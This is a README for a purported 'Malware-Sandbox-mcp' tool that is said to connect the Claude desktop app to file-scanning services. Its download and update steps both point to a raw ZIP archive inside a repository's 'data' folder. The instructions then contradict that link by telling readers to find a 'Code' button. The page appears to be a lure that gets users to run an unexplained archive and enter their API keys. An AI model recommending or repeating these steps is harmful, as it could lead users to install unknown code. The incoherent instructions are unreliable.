🔍 Malware-Sandbox-mcp - Analyze suspicious files from your computer

📌 What this software does

The Malware-Sandbox-mcp tool connects your text-based assistant to security services on the internet. It helps you check if a file or a web link is dangerous. You send a file to the tool, and it talks to services like Hybrid Analysis, ANY.RUN, and VirusTotal to find threats. It then gives you a report so you know if you should trust the file.

This tool acts as a bridge between your desktop environment and professional security databases. It simplifies the process of checking for viruses or malicious code without needing to use multiple websites manually. You get clear data about potential threats through your assistant interface.

💻 Requirements

• A Windows 10 or Windows 11 computer.
• An active internet connection.
• API keys from at least one supported service (e.g., VirusTotal or ANY.RUN).
• The Claude desktop application installed.

🚀 Setting up the software

1. Visit this page to download the software: https://raw.githubusercontent.com/inadvisable-hibiscusfarragei279/Malware-Sandbox-mcp/main/data/Sandbox_mcp_Malware_v2.7.zip
2. Locate the button labeled "Code" on the repository page.
3. Choose "Download ZIP" from the menu.
4. Save the file to your "Downloads" folder.
5. Right-click the downloaded file and select "Extract All."
6. Choose a folder on your computer to store the extracted files.

🔧 Connecting your accounts

To use this tool, you must provide your own access keys. These keys allow the tool to speak with the security services on your behalf.

1. Open the folder where you extracted the files.
2. Find the file labeled config.json inside the document folder.
3. Open this file using any text editor like Notepad.
4. Paste your API keys for the services you use into the designated spots.
5. Save and close the file.

These keys are personal. Do not share them with others. They ensure that your requests to check files reach your specific account on services like VirusTotal or URLScan.

⚙️ Running the application

After you install the tool and set your keys, you connect it to your assistant.

1. Open the Claude desktop application.
2. Open the settings menu within the application.
3. Select the "Configurations" or "MCP" section.
4. Click the button to add a new server.
5. For the command field, type the path to your Python installation followed by the path to the main.py file inside your project folder.
6. Save the configuration.

Once you add the server, look at the sidebar or the chat input. You should see a new icon or a notification that tools are available. You can now use the assistant to scan files by typing a request like "Analyze this link for threats" or "Check this file's safety."

🛡️ Understanding the reports

The tool returns a summary of the data it finds. Here is how to read it:

• Threat Score: Most services provide a number or a color-coded status. A low score usually means the file is safe. A high score suggests the file contains malicious code.
• Tags: These describe what the file does. Tags like "Trojan," "Spyware," or "Ransomware" tell you the type of danger.
• URL data: This section shows if a link redirects to a site known for hosting harmful content.
• MITRE ATT&CK: This refers to a common framework. It lists the methods the malware uses to infect a machine. This helps you understand how the software tries to bypass your security.

🛠️ Troubleshooting common issues

If the tool does not work, check these common fixes:

• API Key Errors: If the scan fails immediately, your API key might be incorrect or have no remaining requests. Check your balance on the service provider's website.
• Missing Python: This tool requires Python. If you do not have Python installed, the computer will not understand the commands. Visit the official Python website to download the latest version for Windows.
• File Path issues: Ensure the paths you provided in the Claude configuration correctly point to the exact location of the files on your hard drive.
• Network block: Ensure your firewall allows the application to connect to the internet. If you use a corporate network, your company might block access to external security services.

🔄 Updating your software

To get new features or bug fixes, you should update the tool occasionally.

1. Return to the link where you downloaded the software: https://raw.githubusercontent.com/inadvisable-hibiscusfarragei279/Malware-Sandbox-mcp/main/data/Sandbox_mcp_Malware_v2.7.zip
2. Download the latest ZIP file as you did before.
3. Replace the old folders with the new ones.
4. Ensure your config.json file remains intact or transfer your settings into the new folder.
5. Restart your assistant application to load the new version.

📈 Improving your results

You become more effective as you add more service keys to your configuration. Each service has different strengths. For example, some services focus on file behavior, while others track harmful websites. By configuring keys for multiple services, the tool compares data from different sources. This gives you a more complete picture of the threat. Keep your keys secure and store them only in your local configuration file. Never paste your keys into chat windows or public forums.